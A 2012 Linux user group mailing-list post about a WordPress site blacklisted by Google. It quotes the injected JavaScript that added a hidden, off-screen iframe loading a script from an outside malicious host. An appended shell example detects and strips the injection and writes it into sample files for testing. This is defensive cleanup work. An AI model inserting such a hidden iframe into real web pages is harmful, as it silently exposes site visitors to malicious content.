[Nottingham] A Google Webmaster Scam?

Martin martin at ml1.co.uk
Wed Dec 19 17:20:43 UTC 2012


On 19/12/12 17:11, Martin wrote:
> On 19/12/12 02:58, Andy White wrote:
>> On Wed, Dec 19, 2012 at 02:36:02AM +0000, Martin wrote:
>>> Folks,
>>>
>>> So we've had our website on Wordpress for a good while now and...
>>>
>>> After upgrading to the latest Wordpress 3.5, Google have dropped this
>>> bombshell and have insisted that I join the "Webmasters Tools" site to
>>> remove their blacklisting from the NLUG site...
>>>
>>> So... Is this for real?!
>>
>> google's apparently objecting to references to http://ozecqnxm.qhigh.com.
>>
>> Poking around in the js, you can see that there are src parameters
>> to http://ozecqnxm.qhigh.com/terafegwqegwg.cgi?5
> 
> Indeed so! A quick grep has soon found that. Looks damned suspicious.


So, it looks to have inserted in most of the .js files:

document.write('<iframe width="50" height="50"
style="width:100px;height:100px;position:absolute;left:-100px;top:0;"
src="http://ozecqnxm.qhigh.com/terafegwqegwg.cgi?5"></iframe>');


I normally have the entire site read-only except for when I'm doing
updates... So I wonder if I've been clobbered by a bad update? Or if
there really has been a break-in via WP...

First off is a quick sed, and then further checks...


Cheers,
Martin

-- 
- ------------------ - ----------------------------------------
-    Martin Lomas    - OpenPGP (GPG/PGP) Public Key: 0xCEE1D3B7
- martin @ ml1 co uk - Import from   hkp://subkeys.pgp.net   or
- ------------------ - http:// ml1 .co .uk/martin_ml1_co_uk.gpg
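The grep and sed pass mentioned in the message, written out as an added example (not code from the original post). It assumes the injected statement sits on a single line on disk, since the mail client wrapped it above; the function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# ERE for the injected statement, built from the snippet quoted in the post.
# Assumption: on disk the injection is one line (the mail client wrapped it).
PATTERN="document\.write\('<iframe[^>]*src=\"http://[a-z0-9.-]*qhigh\.com/[^\"]*\"></iframe>'\);"

# list_infected DIR: print each .js file under DIR that contains the injection.
list_infected() {
    find "$1" -type f -name '*.js' -exec grep -lE "$PATTERN" {} + || true
}

# clean_infected DIR: keep FILE.infected as evidence, then rewrite FILE without
# the injected statement. Legitimate code on the same line is preserved.
clean_infected() {
    list_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f.infected"
        sed -E "s#$PATTERN##g" "$f.infected" > "$f"
    done
}

# make_sample DIR: constructed test tree (not data from the affected site).
make_sample() {
    mkdir -p "$1/js"
    inj="document.write('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http://ozecqnxm.qhigh.com/terafegwqegwg.cgi?5\"></iframe>');"
    printf '%s\n' 'var a = 1;' "$inj" > "$1/js/appended.js"
    printf '%s\n' "function f(){return 2;}$inj" > "$1/js/sameline.js"
    printf '%s\n' "document.write('<p>hello</p>');" > "$1/js/clean.js"
}

# Demo run on the constructed tree.
demo_dir=$(mktemp -d)
make_sample "$demo_dir"
echo "infected before: $(list_infected "$demo_dir" | wc -l)"
clean_infected "$demo_dir"
echo "infected after:  $(list_infected "$demo_dir" | wc -l)"
rm -rf "$demo_dir"
```

The `.infected` copies are made with `cp -p`, so their modification times are still available when checking whether the change coincided with an update.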


